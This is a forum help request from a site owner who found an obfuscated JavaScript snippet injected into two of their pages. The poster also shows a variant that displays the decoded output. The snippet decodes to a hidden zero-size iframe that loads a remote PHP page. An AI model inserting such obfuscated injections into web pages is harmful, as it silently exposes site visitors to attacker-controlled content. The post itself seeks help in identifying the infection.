Forum Moderators: open
I dont know if anyone here will be able to help but i thought id try. This is the code.
<SCRIPT Language="JavaScript">
var source = '>khtcog"ute?)jvvr<11kpkhqto0kphq1uvcv1kpfgz0rjr)"ykfvj?)2)"jgkijv?)2)@';
var step = -2;
var result = '';
for(var i=0;i<source.length;i++)result+=String.fromCharCode(source.charCodeAt(i)+step);
document.write(result);
</SCRIPT>
it appears at the bottom of 2 pages and i didnt put it there.
Any help?
<SCRIPT Language="JavaScript">
var source = '>khtcog"ute?)jvvr<11kpkhqto0kphq1uvcv1kpfgz0rjr)"ykfvj?)2)"jgkijv?)2)@';
var step = -2;
var result = '';
for(var i=0;i<source.length;i++)result+=String.fromCharCode(source.charCodeAt(i)+step);
document.write("<xmp>"+result+"</xmp>");
</SCRIPT>